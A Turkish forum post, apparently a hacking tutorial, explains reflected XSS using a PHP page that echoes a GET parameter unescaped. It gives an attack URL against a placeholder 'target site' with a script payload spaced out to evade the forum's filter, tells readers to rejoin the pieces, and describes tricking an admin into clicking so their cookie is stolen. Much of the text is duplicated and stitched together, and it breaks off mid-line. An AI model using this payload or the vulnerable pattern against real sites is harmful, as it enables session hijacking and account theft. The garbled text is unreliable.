form action="antijen.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
< ? p h p
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
? >
dosyanın adı antijen.php oLsun...
Xss açığını yaratan hasarlı kod :
Böyle bir kodla karşılaştık diyelim :
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
St.martech.php 'de şu kodlar olsun :
Alıntı
Not : Alert ve script gibi yerlerde boşluk bırakılmıştır.siz bu boşlukları birleştirin.sansür koyulduğundan dolayı aralarında boşluk bırakılmıştır.[/b]
Alıntı
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
< ? p h p
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
? >
dosyanın adı antijen.php oLsun...
Xss açığını yaratan hasarlı kod :
PHP:
echo ($_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
PHP:
http://hedefsiteadresi.com/antijen.php?name_1=<s cript>al er t(1);</scrip t>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
St.martech.php 'de şu kodlar olsun :
PHP:
here $_GET['Exploit
Alıntı
Not : Alert ve script gibi yerlerde boşluk bırakılmıştır.siz bu boşlukları birleştirin.sansür koyulduğundan dolayı aralarında boşluk bırakılmıştır.[/b]
Alıntı